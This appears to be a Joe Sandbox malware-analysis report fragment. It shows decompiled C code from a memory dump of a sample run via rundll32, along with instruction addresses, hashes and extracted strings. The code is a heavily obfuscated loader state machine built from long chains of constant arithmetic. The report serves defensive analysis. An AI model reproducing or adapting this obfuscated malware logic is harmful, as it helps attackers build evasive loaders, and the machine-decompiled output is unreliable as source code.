                                                                                                                      				_v1748 = _v1748 >> 4;
                                                                                                                      				_v1748 = _v1748 ^ 0x7ee23abc;
                                                                                                                      				_v1748 = _v1748 ^ 0x7eed6078;
                                                                                                                      				_v1660 = 0x8a8a87;
                                                                                                                      				_v1660 = _v1660 + 0xb3eb;
                                                                                                                      				_v1660 = _v1660 ^ 0x0081b7ad;
                                                                                                                      				_v1716 = 0x7622c2;
                                                                                                                      				_v1716 = _v1716 ^ 0x68bb0f30;
                                                                                                                      				_v1716 = _v1716 ^ 0x34de6465;
                                                                                                                      				_v1716 = _v1716 ^ 0x5c136dbb;
                                                                                                                      				_v1684 = 0xf6dfed;
                                                                                                                      				_v1684 = _v1684 << 0xb;
                                                                                                                      				_v1684 = _v1684 | 0x3f4bdd8f;
                                                                                                                      				_v1684 = _v1684 ^ 0xbff0253f;
                                                                                                                      				_v1816 = 0xe04e35;
                                                                                                                      				_v1816 = _v1816 >> 2;
                                                                                                                      				_v1816 = _v1816 + 0x327b;
                                                                                                                      				_v1816 = _v1816 + 0x911b;
                                                                                                                      				_v1816 = _v1816 ^ 0x003e79db;
                                                                                                                      				_v1612 = 0xd6f31e;
                                                                                                                      				_v1612 = _v1612 | 0x3022205e;
                                                                                                                      				_v1612 = _v1612 ^ 0x30f4c89e;
                                                                                                                      				_v1784 = 0xaf77e7;
                                                                                                                      				_t634 = 0x4a;
                                                                                                                      				_v1784 = _v1784 / _t634;
                                                                                                                      				_v1784 = _v1784 | 0x421bf711;
                                                                                                                      				_t635 = 0x50;
                                                                                                                      				_v1784 = _v1784 * 0x54;
                                                                                                                      				_v1784 = _v1784 ^ 0xb12f1f5b;
                                                                                                                      				_v1652 = 0xf84d37;
                                                                                                                      				_v1652 = _v1652 * 0x24;
                                                                                                                      				_v1652 = _v1652 ^ 0x22e540eb;
                                                                                                                      				_v1792 = 0xffdc51;
                                                                                                                      				_v1792 = _v1792 << 0xa;
                                                                                                                      				_v1792 = _v1792 | 0xe1b7830e;
                                                                                                                      				_v1792 = _v1792 + 0xffff0b40;
                                                                                                                      				_v1792 = _v1792 ^ 0xfffcd716;
                                                                                                                      				_v1740 = 0x197a11;
                                                                                                                      				_v1740 = _v1740 << 5;
                                                                                                                      				_v1740 = _v1740 / _t635;
                                                                                                                      				_v1740 = _v1740 ^ 0x00038a69;
                                                                                                                      				_v1644 = 0x6b00f0;
                                                                                                                      				_v1644 = _v1644 << 0xa;
                                                                                                                      				_v1644 = _v1644 ^ 0xac018c07;
                                                                                                                      				_v1604 = 0x611781;
                                                                                                                      				_v1604 = _v1604 << 0xf;
                                                                                                                      				_v1604 = _v1604 ^ 0x8bc919f5;
                                                                                                                      				_v1808 = 0xd36465;
                                                                                                                      				_t636 = 6;
                                                                                                                      				_v1808 = _v1808 * 0x36;
                                                                                                                      				_v1808 = _v1808 / _t636;
                                                                                                                      				_v1808 = _v1808 << 1;
                                                                                                                      				_v1808 = _v1808 ^ 0x0edf69e5;
                                                                                                                      				_v1832 = 0x3f9dc0;
                                                                                                                      				_v1832 = _v1832 + 0xffff18c0;
                                                                                                                      				_v1832 = _v1832 ^ 0x4a717db2;
                                                                                                                      				_v1832 = _v1832 << 8;
                                                                                                                      				_v1832 = _v1832 ^ 0x4fcf9c5e;
                                                                                                                      				_v1732 = 0x9e099a;
                                                                                                                      				_v1732 = _v1732 ^ 0xff857814;
                                                                                                                      				_v1732 = _v1732 + 0xffffca1f;
                                                                                                                      				_v1732 = _v1732 ^ 0xff111531;
                                                                                                                      				_v1776 = 0x4db87;
                                                                                                                      				_v1776 = _v1776 + 0xffff62f5;
                                                                                                                      				_v1776 = _v1776 ^ 0x44009895;
                                                                                                                      				_v1776 = _v1776 << 2;
                                                                                                                      				_v1776 = _v1776 ^ 0x101849e4;
                                                                                                                      				_v1708 = 0xd244cf;
                                                                                                                      				_v1708 = _v1708 >> 9;
                                                                                                                      				_t637 = 0x3a;
                                                                                                                      				_v1708 = _v1708 * 0x11;
                                                                                                                      				_v1708 = _v1708 ^ 0x000db4cc;
                                                                                                                      				_v1636 = 0xf59e87;
                                                                                                                      				_v1636 = _v1636 + 0xffff8d09;
                                                                                                                      				_v1636 = _v1636 ^ 0x00f1a368;
                                                                                                                      				_v1724 = 0x2bdcc8;
                                                                                                                      				_v1724 = _v1724 * 0x51;
                                                                                                                      				_v1724 = _v1724 * 0x5d;
                                                                                                                      				_v1724 = _v1724 ^ 0x0aa2c27a;
                                                                                                                      				_v1828 = 0x689116;
                                                                                                                      				_v1828 = _v1828 + 0xfffffd09;
                                                                                                                      				_v1828 = _v1828 / _t637;
                                                                                                                      				_t638 = 0x67;
                                                                                                                      				_v1828 = _v1828 / _t638;
                                                                                                                      				_v1828 = _v1828 ^ 0x000cd418;
                                                                                                                      				_v1692 = 0xa047a9;
                                                                                                                      				_v1692 = _v1692 << 6;
                                                                                                                      				_v1692 = _v1692 >> 3;
                                                                                                                      				_v1692 = _v1692 ^ 0x0505fbf3;
                                                                                                                      				_v1616 = 0xb6eb58;
                                                                                                                      				_v1616 = _v1616 ^ 0x8fb73430;
                                                                                                                      				_v1616 = _v1616 ^ 0x8f037651;
                                                                                                                      				_v1752 = 0x713cbb;
                                                                                                                      				_t639 = 0x59;
                                                                                                                      				_v1752 = _v1752 / _t639;
                                                                                                                      				_v1752 = _v1752 | 0x24e66ff7;
                                                                                                                      				_v1752 = _v1752 ^ 0x24e68565;
                                                                                                                      				_v1760 = 0x2ce68a;
                                                                                                                      				_v1760 = _v1760 + 0xf472;
                                                                                                                      				_v1760 = _v1760 >> 6;
                                                                                                                      				_v1760 = _v1760 ^ 0x000e4d4e;
                                                                                                                      				_v1764 = 0xb3dbfb;
                                                                                                                      				_v1764 = _v1764 * 0x44;
                                                                                                                      				_v1764 = _v1764 ^ 0x846d2ad4;
                                                                                                                      				_v1764 = _v1764 ^ 0xaba28cf9;
                                                                                                                      				_v1632 = 0xed14fe;
                                                                                                                      				_v1632 = _v1632 + 0x899;
                                                                                                                      				_v1632 = _v1632 ^ 0x00e7b355;
                                                                                                                      				_v1640 = 0x173d8;
                                                                                                                      				_v1640 = _v1640 | 0x072f8d22;
                                                                                                                      				_v1640 = _v1640 ^ 0x0725dc6d;
                                                                                                                      				_v1704 = 0xb743b;
                                                                                                                      				_v1704 = _v1704 * 0x22;
                                                                                                                      				_v1704 = _v1704 ^ 0x7ac75999;
                                                                                                                      				_v1704 = _v1704 ^ 0x7b4b4761;
                                                                                                                      				_v1648 = 0x376518;
                                                                                                                      				_t640 = 0x2b;
                                                                                                                      				_v1648 = _v1648 / _t640;
                                                                                                                      				_v1648 = _v1648 ^ 0x0009ae4a;
                                                                                                                      				_v1656 = 0x799ab2;
                                                                                                                      				_v1656 = _v1656 >> 5;
                                                                                                                      				_v1656 = _v1656 ^ 0x00024b68;
                                                                                                                      				_v1688 = 0x532d8e;
                                                                                                                      				_v1688 = _v1688 + 0xeacd;
                                                                                                                      				_t641 = 0x1f;
                                                                                                                      				_v1688 = _v1688 / _t641;
                                                                                                                      				_v1688 = _v1688 ^ 0x000bfc86;
                                                                                                                      				_v1696 = 0x1a47c3;
                                                                                                                      				_t642 = 0x35;
                                                                                                                      				_v1696 = _v1696 * 0x3c;
                                                                                                                      				_v1696 = _v1696 * 0x79;
                                                                                                                      				_v1696 = _v1696 ^ 0xe948599c;
                                                                                                                      				_v1788 = 0x31ddc5;
                                                                                                                      				_v1788 = _v1788 / _t642;
                                                                                                                      				_v1788 = _v1788 | 0x1a71d74c;
                                                                                                                      				_v1788 = _v1788 ^ 0xb8e3b14c;
                                                                                                                      				_v1788 = _v1788 ^ 0xa29596cb;
                                                                                                                      				_v1796 = 0xb7daa1;
                                                                                                                      				_v1796 = _v1796 + 0xffff2907;
                                                                                                                      				_v1796 = _v1796 >> 1;
                                                                                                                      				_t643 = 0x19;
                                                                                                                      				_v1796 = _v1796 * 0x38;
                                                                                                                      				_v1796 = _v1796 ^ 0x140afc74;
                                                                                                                      				_v1680 = 0x68ee60;
                                                                                                                      				_t407 =  &_v1680; // 0x68ee60
                                                                                                                      				_v1680 =  *_t407 / _t643;
                                                                                                                      				_t413 =  &_v1680; // 0x68ee60
                                                                                                                      				_t644 = 0x4b;
                                                                                                                      				_v1680 =  *_t413 / _t644;
                                                                                                                      				_v1680 = _v1680 ^ 0x000d0b0c;
                                                                                                                      				_v1624 = 0x50062a;
                                                                                                                      				_v1624 = _v1624 + 0xffffe4c0;
                                                                                                                      				_v1624 = _v1624 ^ 0x004144d3;
                                                                                                                      				_v1772 = 0x8d0174;
                                                                                                                      				_v1772 = _v1772 | 0x883a70ab;
                                                                                                                      				_t645 = 0x7c;
                                                                                                                      				_v1772 = _v1772 / _t645;
                                                                                                                      				_v1772 = _v1772 + 0x6c34;
                                                                                                                      				_v1772 = _v1772 ^ 0x01154615;
                                                                                                                      				_v1780 = 0x3c67da;
                                                                                                                      				_v1780 = _v1780 ^ 0x3b09705b;
                                                                                                                      				_t646 = 0x39;
                                                                                                                      				_v1780 = _v1780 / _t646;
                                                                                                                      				_v1780 = _v1780 | 0x19d7c010;
                                                                                                                      				_v1780 = _v1780 ^ 0x19d74af7;
                                                                                                                      				_v1664 = 0x6ef7ab;
                                                                                                                      				_v1664 = _v1664 >> 0x10;
                                                                                                                      				_v1664 = _v1664 ^ 0x00064358;
                                                                                                                      				_v1712 = 0x6e7286;
                                                                                                                      				_v1712 = _v1712 << 3;
                                                                                                                      				_v1712 = _v1712 + 0xffff7147;
                                                                                                                      				_v1712 = _v1712 ^ 0x03763b5e;
                                                                                                                      				_v1720 = 0x51f33b;
                                                                                                                      				_v1720 = _v1720 * 0x24;
                                                                                                                      				_v1720 = _v1720 | 0x382a3589;
                                                                                                                      				_v1720 = _v1720 ^ 0x3ba3189b;
                                                                                                                      				_v1672 = 0xa7c9a6;
                                                                                                                      				_v1672 = _v1672 | 0x6235af6b;
                                                                                                                      				_v1672 = _v1672 ^ 0x62b8a2b2;
                                                                                                                      				_t706 = _v1596;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t602 = 0x4d28763;
                                                                                                                      					while(1) {
                                                                                                                      						L2:
                                                                                                                      						_t647 = 0x87702da;
                                                                                                                      						L3:
                                                                                                                      						while(_t708 != 0x23fa72) {
                                                                                                                      							if(_t708 == 0x2649e52) {
                                                                                                                      								_push(_v1656);
                                                                                                                      								_push(_v1648);
                                                                                                                      								_push(_v1704);
                                                                                                                      								_push( &_v1564);
                                                                                                                      								_push( &_v1592);
                                                                                                                      								_push(_v1640);
                                                                                                                      								_push(_t647);
                                                                                                                      								_push(0);
                                                                                                                      								_t605 = E00349700(0, _v1632, __eflags);
                                                                                                                      								_t714 = _t713 + 0x20;
                                                                                                                      								__eflags = _t605;
                                                                                                                      								if(_t605 == 0) {
                                                                                                                      									L27:
                                                                                                                      									return _t605;
                                                                                                                      								}
                                                                                                                      								E00354DAD(_v1688, _v1696, _v1592, _v1788, _v1796);
                                                                                                                      								_t713 = _t714 + 0xc;
                                                                                                                      								_push(_v1780);
                                                                                                                      								_push(_v1772);
                                                                                                                      								_t696 = _v1624;
                                                                                                                      								_push(_v1588);
                                                                                                                      								_t650 = _v1680;
                                                                                                                      								L26:
                                                                                                                      								return E00354DAD(_t650, _t696);
                                                                                                                      							}
                                                                                                                      							if(_t708 == 0x3216d22) {
                                                                                                                      								_push(_v1672);
                                                                                                                      								_push(_v1720);
                                                                                                                      								_t696 = _v1712;
                                                                                                                      								_push(_v1596);
                                                                                                                      								_t650 = _v1664;
                                                                                                                      								goto L26;
                                                                                                                      							}
                                                                                                                      							if(_t708 == 0x6088cb4) {
                                                                                                                      								__eflags = _t706 - _t602;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									_t708 = 0xd3ee486;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      								_push(_t647);
                                                                                                                      								_t605 = E0034B41A(_v1608, _v1768,  &_v1596, _v1804, _v1736);
                                                                                                                      								_t713 = _t713 + 0x14;
                                                                                                                      								__eflags = _t605;
                                                                                                                      								if(__eflags == 0) {
                                                                                                                      									goto L27;
                                                                                                                      								}
                                                                                                                      								_t708 = 0xd3ee486;
                                                                                                                      								while(1) {
                                                                                                                      									L1:
                                                                                                                      									_t602 = 0x4d28763;
                                                                                                                      									L2:
                                                                                                                      									_t647 = 0x87702da;
                                                                                                                      									goto L3;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							if(_t708 == 0x7bff6cd) {
                                                                                                                      								_t612 = E0034B186();
                                                                                                                      								__eflags = _t612 - E00349685(_t647);
                                                                                                                      								_t602 = 0x4d28763;
                                                                                                                      								_t708 = 0x6088cb4;
                                                                                                                      								_t706 =  !=  ? 0x4d28763 : 0x58d295;
                                                                                                                      								goto L2;
                                                                                                                      							}
                                                                                                                      							if(_t708 == _t647) {
                                                                                                                      								_push(_v1596);
                                                                                                                      								_t615 = E0035363D( &_v1564, _v1832, _v1732, _v1776, _v1708,  &_v1592, _t647);
                                                                                                                      								_t713 = _t713 + 0x1c;
                                                                                                                      								__eflags = _t615;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									E00354DAD(_v1636, _v1724, _v1592, _v1828, _v1692);
                                                                                                                      									E00354DAD(_v1616, _v1752, _v1588, _v1760, _v1764);
                                                                                                                      									_t713 = _t713 + 0x18;
                                                                                                                      								}
                                                                                                                      								L11:
                                                                                                                      								_t708 = 0x3216d22;
                                                                                                                      								goto L1;
                                                                                                                      							}
                                                                                                                      							_t727 = _t708 - 0xd3ee486;
                                                                                                                      							if(_t708 != 0xd3ee486) {
                                                                                                                      								L21:
                                                                                                                      								__eflags = _t708 - 0x61b4f51;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      								return _t602;
                                                                                                                      							}
                                                                                                                      							E003612A8(_t647, _v1824, _t727, _v1800, _v1668,  &_v1044);
                                                                                                                      							 *((short*)(E00354FA8(_v1676,  &_v1044, _v1700, _v1728))) = 0;
                                                                                                                      							E00348650(_v1620,  &_v524, _t727, _v1756);
                                                                                                                      							_push(_v1716);
                                                                                                                      							_push(_v1660);
                                                                                                                      							_push(0x34183c);
                                                                                                                      							E0034E7CE(E0034AB66(_v1600, _v1748, _t727), _t727, _v1684,  &_v1044, _v1600, _v1816, _v1612, _v1784, _v1652,  &_v524);
                                                                                                                      							E0034AE03(_v1792, _v1740, _v1644, _t622);
                                                                                                                      							_t627 = E0035C38F(_v1604,  &_v1564, _t629, _v1808);
                                                                                                                      							_t713 = _t713 + 0x54;
                                                                                                                      							if(_t627 != 0) {
                                                                                                                      								_t602 = 0x4d28763;
                                                                                                                      								__eflags = _t706 - 0x4d28763;
                                                                                                                      								_t647 = 0x87702da;
                                                                                                                      								_t708 =  ==  ? 0x87702da : 0x2649e52;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							goto L11;
                                                                                                                      						}
                                                                                                                      						_t708 = 0x7bff6cd;
                                                                                                                      						goto L21;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}

                                                                                                                      0x00343328
                                                                                                                      0x0034332b
                                                                                                                      0x0034332f
                                                                                                                      0x00343337
                                                                                                                      0x0034334a
                                                                                                                      0x00343351
                                                                                                                      0x0034335c
                                                                                                                      0x00343364
                                                                                                                      0x00343369
                                                                                                                      0x00343371
                                                                                                                      0x00343379
                                                                                                                      0x00343381
                                                                                                                      0x00343389
                                                                                                                      0x00343396
                                                                                                                      0x0034339a
                                                                                                                      0x003433a2
                                                                                                                      0x003433ad
                                                                                                                      0x003433b5
                                                                                                                      0x003433c0
                                                                                                                      0x003433cb
                                                                                                                      0x003433d3
                                                                                                                      0x003433de
                                                                                                                      0x003433eb
                                                                                                                      0x003433ec
                                                                                                                      0x003433f6
                                                                                                                      0x003433fc
                                                                                                                      0x00343400
                                                                                                                      0x00343408
                                                                                                                      0x00343410
                                                                                                                      0x00343418
                                                                                                                      0x00343420
                                                                                                                      0x00343425
                                                                                                                      0x0034342d
                                                                                                                      0x00343435
                                                                                                                      0x0034343d
                                                                                                                      0x00343445
                                                                                                                      0x0034344d
                                                                                                                      0x00343455
                                                                                                                      0x0034345d
                                                                                                                      0x00343465
                                                                                                                      0x0034346a
                                                                                                                      0x00343472
                                                                                                                      0x0034347d
                                                                                                                      0x0034348f
                                                                                                                      0x00343492
                                                                                                                      0x00343499
                                                                                                                      0x003434a4
                                                                                                                      0x003434af
                                                                                                                      0x003434ba
                                                                                                                      0x003434c5
                                                                                                                      0x003434d8
                                                                                                                      0x003434e7
                                                                                                                      0x003434ee
                                                                                                                      0x003434f9
                                                                                                                      0x00343501
                                                                                                                      0x00343511
                                                                                                                      0x00343519
                                                                                                                      0x0034351e
                                                                                                                      0x00343524
                                                                                                                      0x0034352c
                                                                                                                      0x00343537
                                                                                                                      0x0034353f
                                                                                                                      0x00343547
                                                                                                                      0x00343552
                                                                                                                      0x0034355d
                                                                                                                      0x00343568
                                                                                                                      0x00343573
                                                                                                                      0x0034357f
                                                                                                                      0x00343582
                                                                                                                      0x00343586
                                                                                                                      0x0034358e
                                                                                                                      0x00343596
                                                                                                                      0x0034359e
                                                                                                                      0x003435a6
                                                                                                                      0x003435ab
                                                                                                                      0x003435b3
                                                                                                                      0x003435c0
                                                                                                                      0x003435c4
                                                                                                                      0x003435cc
                                                                                                                      0x003435d4
                                                                                                                      0x003435df
                                                                                                                      0x003435ea
                                                                                                                      0x003435f5
                                                                                                                      0x00343600
                                                                                                                      0x0034360b
                                                                                                                      0x00343616
                                                                                                                      0x00343629
                                                                                                                      0x00343630
                                                                                                                      0x0034363b
                                                                                                                      0x00343648
                                                                                                                      0x0034365c
                                                                                                                      0x00343661
                                                                                                                      0x0034366a
                                                                                                                      0x00343675
                                                                                                                      0x00343680
                                                                                                                      0x00343688
                                                                                                                      0x00343693
                                                                                                                      0x0034369e
                                                                                                                      0x003436b0
                                                                                                                      0x003436b5
                                                                                                                      0x003436be
                                                                                                                      0x003436c9
                                                                                                                      0x003436dc
                                                                                                                      0x003436df
                                                                                                                      0x003436ee
                                                                                                                      0x003436f5
                                                                                                                      0x00343700
                                                                                                                      0x00343710
                                                                                                                      0x00343714
                                                                                                                      0x0034371c
                                                                                                                      0x00343724
                                                                                                                      0x0034372c
                                                                                                                      0x00343734
                                                                                                                      0x0034373c
                                                                                                                      0x00343745
                                                                                                                      0x00343748
                                                                                                                      0x0034374c
                                                                                                                      0x00343754
                                                                                                                      0x0034375f
                                                                                                                      0x0034376a
                                                                                                                      0x00343771
                                                                                                                      0x00343778
                                                                                                                      0x0034377d
                                                                                                                      0x00343786
                                                                                                                      0x00343791
                                                                                                                      0x0034379c
                                                                                                                      0x003437a7
                                                                                                                      0x003437b2
                                                                                                                      0x003437ba
                                                                                                                      0x003437c6
                                                                                                                      0x003437cb
                                                                                                                      0x003437d1
                                                                                                                      0x003437d9
                                                                                                                      0x003437e1
                                                                                                                      0x003437e9
                                                                                                                      0x003437f5
                                                                                                                      0x003437f8
                                                                                                                      0x003437fc
                                                                                                                      0x00343804
                                                                                                                      0x0034380c
                                                                                                                      0x00343817
                                                                                                                      0x00343824
                                                                                                                      0x0034382f
                                                                                                                      0x0034383a
                                                                                                                      0x00343842
                                                                                                                      0x0034384d
                                                                                                                      0x00343858
                                                                                                                      0x0034386b
                                                                                                                      0x00343872
                                                                                                                      0x0034387d
                                                                                                                      0x00343888
                                                                                                                      0x00343893
                                                                                                                      0x0034389e
                                                                                                                      0x003438a9
                                                                                                                      0x003438b0
                                                                                                                      0x003438b0
                                                                                                                      0x003438b0
                                                                                                                      0x003438b5
                                                                                                                      0x003438b5
                                                                                                                      0x003438b5
                                                                                                                      0x00000000
                                                                                                                      0x003438ba
                                                                                                                      0x003438cc
                                                                                                                      0x00343b5f
                                                                                                                      0x00343b6d
                                                                                                                      0x00343b74
                                                                                                                      0x00343b7b
                                                                                                                      0x00343b83
                                                                                                                      0x00343b84
                                                                                                                      0x00343b92
                                                                                                                      0x00343b93
                                                                                                                      0x00343b97
                                                                                                                      0x00343b9c
                                                                                                                      0x00343b9f
                                                                                                                      0x00343ba1
                                                                                                                      0x00343bf7
                                                                                                                      0x00343bf7
                                                                                                                      0x00343bf7
                                                                                                                      0x00343bc0
                                                                                                                      0x00343bc5
                                                                                                                      0x00343bc8
                                                                                                                      0x00343bcc
                                                                                                                      0x00343bd0
                                                                                                                      0x00343bd7
                                                                                                                      0x00343bde
                                                                                                                      0x00343be5
                                                                                                                      0x00000000
                                                                                                                      0x00343bea
                                                                                                                      0x003438d4
                                                                                                                      0x00343b37
                                                                                                                      0x00343b3e
                                                                                                                      0x00343b45
                                                                                                                      0x00343b4c
                                                                                                                      0x00343b53
                                                                                                                      0x00000000
                                                                                                                      0x00343b53
                                                                                                                      0x003438e0
                                                                                                                      0x00343add
                                                                                                                      0x00343adf
                                                                                                                      0x00343b17
                                                                                                                      0x00000000
                                                                                                                      0x00343b17
                                                                                                                      0x00343ae1
                                                                                                                      0x00343afd
                                                                                                                      0x00343b02
                                                                                                                      0x00343b05
                                                                                                                      0x00343b07
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00343b0d
                                                                                                                      0x003438b0
                                                                                                                      0x003438b0
                                                                                                                      0x003438b0
                                                                                                                      0x003438b5
                                                                                                                      0x003438b5
                                                                                                                      0x00000000
                                                                                                                      0x003438b5

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $Fs$+M$4l$5N$AX$[e$[p;$^ "0$`h$aGK{$x`~${2$@"
                                                                                                                      • API String ID: 0-3551049037
                                                                                                                      • Opcode ID: 43f7302fdcaf2a012deef5b53f6b9c9f981160d5e2646994b90374987bd6801a
                                                                                                                      • Instruction ID: 45c4cb285c84ef8f2afcae057e99faec72e0649fecd4aada6b0c3c9aaa21ed27
                                                                                                                      • Opcode Fuzzy Hash: 43f7302fdcaf2a012deef5b53f6b9c9f981160d5e2646994b90374987bd6801a
                                                                                                                      • Instruction Fuzzy Hash: 0C5200715093818FD379CF21C54AB9BBBE2BBC4708F10891DE6DA9A260D7B19949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E00349A7D(intOrPtr* __ecx) {
                                                                                                                      				char _v68;
                                                                                                                      				char _v76;
                                                                                                                      				char _v80;
                                                                                                                      				intOrPtr* _v84;
                                                                                                                      				char _v88;
                                                                                                                      				char _v92;
                                                                                                                      				char _v96;
                                                                                                                      				char _v100;
                                                                                                                      				char _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				signed int _v200;
                                                                                                                      				signed int _v204;
                                                                                                                      				unsigned int _v208;
                                                                                                                      				signed int _v212;
                                                                                                                      				signed int _v216;
                                                                                                                      				signed int _v220;
                                                                                                                      				signed int _v224;
                                                                                                                      				signed int _v228;
                                                                                                                      				signed int _v232;
                                                                                                                      				signed int _v236;
                                                                                                                      				signed int _v240;
                                                                                                                      				signed int _v244;
                                                                                                                      				signed int _v248;
                                                                                                                      				signed int _v252;
                                                                                                                      				signed int _v256;
                                                                                                                      				signed int _v260;
                                                                                                                      				signed int _v264;
                                                                                                                      				signed int _v268;
                                                                                                                      				signed int _v272;
                                                                                                                      				signed int _v276;
                                                                                                                      				signed int _v280;
                                                                                                                      				signed int _v284;
                                                                                                                      				signed int _v288;
                                                                                                                      				signed int _v292;
                                                                                                                      				signed int _v296;
                                                                                                                      				signed int _v300;
                                                                                                                      				signed int _v304;
                                                                                                                      				signed int _v308;
                                                                                                                      				signed int _v312;
                                                                                                                      				signed int _v316;
                                                                                                                      				signed int _v320;
                                                                                                                      				signed int _v324;
                                                                                                                      				signed int _v328;
                                                                                                                      				signed int _v332;
                                                                                                                      				signed int _v336;
                                                                                                                      				signed int _v340;
                                                                                                                      				signed int _v344;
                                                                                                                      				signed int _v348;
                                                                                                                      				signed int _v352;
                                                                                                                      				signed int _v356;
                                                                                                                      				signed int _v360;
                                                                                                                      				signed int _v364;
                                                                                                                      				signed int _v368;
                                                                                                                      				signed int _v372;
                                                                                                                      				signed int _v376;
                                                                                                                      				signed int _v380;
                                                                                                                      				signed int _v384;
                                                                                                                      				signed int _v388;
                                                                                                                      				signed int _v392;
                                                                                                                      				signed int _v396;
                                                                                                                      				signed int _v400;
                                                                                                                      				signed int _v404;
                                                                                                                      				signed int _v408;
                                                                                                                      				signed int _v412;
                                                                                                                      				signed int _v416;
                                                                                                                      				void* _t761;
                                                                                                                      				void* _t762;
                                                                                                                      				void* _t764;
                                                                                                                      				void* _t768;
                                                                                                                      				intOrPtr _t770;
                                                                                                                      				void* _t775;
                                                                                                                      				void* _t784;
                                                                                                                      				void* _t796;
                                                                                                                      				signed int _t802;
                                                                                                                      				signed int _t803;
                                                                                                                      				signed int _t804;
                                                                                                                      				signed int _t805;
                                                                                                                      				signed int _t806;
                                                                                                                      				signed int _t807;
                                                                                                                      				signed int _t808;
                                                                                                                      				signed int _t809;
                                                                                                                      				signed int _t810;
                                                                                                                      				signed int _t811;
                                                                                                                      				signed int _t812;
                                                                                                                      				signed int _t813;
                                                                                                                      				void* _t814;
                                                                                                                      				void* _t880;
                                                                                                                      				intOrPtr* _t900;
                                                                                                                      				signed int _t902;
                                                                                                                      				void* _t903;
                                                                                                                      				void* _t907;
                                                                                                                      				void* _t908;
                                                                                                                      				void* _t915;
                                                                                                                      
                                                                                                                      				_v120 = 0xaf91c9;
                                                                                                                      				_v120 = _v120 * 0xc;
                                                                                                                      				_t900 = __ecx;
                                                                                                                      				_v120 = _v120 ^ 0x083ad56c;
                                                                                                                      				_t907 = 0;
                                                                                                                      				_v160 = 0xdd67b2;
                                                                                                                      				_t796 = 0x60e8fa3;
                                                                                                                      				_v160 = _v160 + 0xffff9007;
                                                                                                                      				_v160 = _v160 ^ 0x00dcf7b9;
                                                                                                                      				_v128 = 0xd2bb52;
                                                                                                                      				_v128 = _v128 + 0x4dd6;
                                                                                                                      				_v128 = _v128 ^ 0x00d30928;
                                                                                                                      				_v340 = 0x29bf77;
                                                                                                                      				_v340 = _v340 | 0xa59b3ed7;
                                                                                                                      				_t802 = 0x26;
                                                                                                                      				_v84 = __ecx;
                                                                                                                      				_v340 = _v340 * 0x24;
                                                                                                                      				_v340 = _v340 / _t802;
                                                                                                                      				_v340 = _v340 ^ 0x02102f1f;
                                                                                                                      				_v136 = 0x5cee52;
                                                                                                                      				_t31 =  &_v136; // 0x5cee52
                                                                                                                      				_v136 =  *_t31 * 0x7d;
                                                                                                                      				_v136 = _v136 ^ 0x2d605e0a;
                                                                                                                      				_v108 = 0xa45e80;
                                                                                                                      				_v108 = _v108 | 0x375210cb;
                                                                                                                      				_v108 = _v108 ^ 0x37f65ecb;
                                                                                                                      				_v280 = 0xda067f;
                                                                                                                      				_v280 = _v280 / _t802;
                                                                                                                      				_v280 = _v280 + 0xffff2a0f;
                                                                                                                      				_v280 = _v280 ^ 0x0004e6dc;
                                                                                                                      				_v272 = 0x722186;
                                                                                                                      				_v272 = _v272 ^ 0xa185ec82;
                                                                                                                      				_v272 = _v272 ^ 0x3ba6498b;
                                                                                                                      				_v272 = _v272 ^ 0x9a51848f;
                                                                                                                      				_v292 = 0x4e3196;
                                                                                                                      				_v292 = _v292 + 0xb94f;
                                                                                                                      				_v292 = _v292 * 0x4e;
                                                                                                                      				_v292 = _v292 ^ 0x180b91c6;
                                                                                                                      				_v208 = 0x6998d9;
                                                                                                                      				_v208 = _v208 >> 0xe;
                                                                                                                      				_v208 = _v208 ^ 0x000001a6;
                                                                                                                      				_v240 = 0x4e7103;
                                                                                                                      				_v240 = _v240 * 0x4c;
                                                                                                                      				_v240 = _v240 ^ 0xd0eec6a6;
                                                                                                                      				_v240 = _v240 ^ 0xc7a74a42;
                                                                                                                      				_v312 = 0x7234ec;
                                                                                                                      				_v312 = _v312 ^ 0x522d2006;
                                                                                                                      				_v312 = _v312 << 6;
                                                                                                                      				_v312 = _v312 + 0x869a;
                                                                                                                      				_v312 = _v312 ^ 0x97c5c11a;
                                                                                                                      				_v364 = 0xaf3901;
                                                                                                                      				_v364 = _v364 + 0xffff0df3;
                                                                                                                      				_v364 = _v364 + 0xacd;
                                                                                                                      				_v364 = _v364 << 6;
                                                                                                                      				_v364 = _v364 ^ 0x2b91257f;
                                                                                                                      				_v244 = 0x42065a;
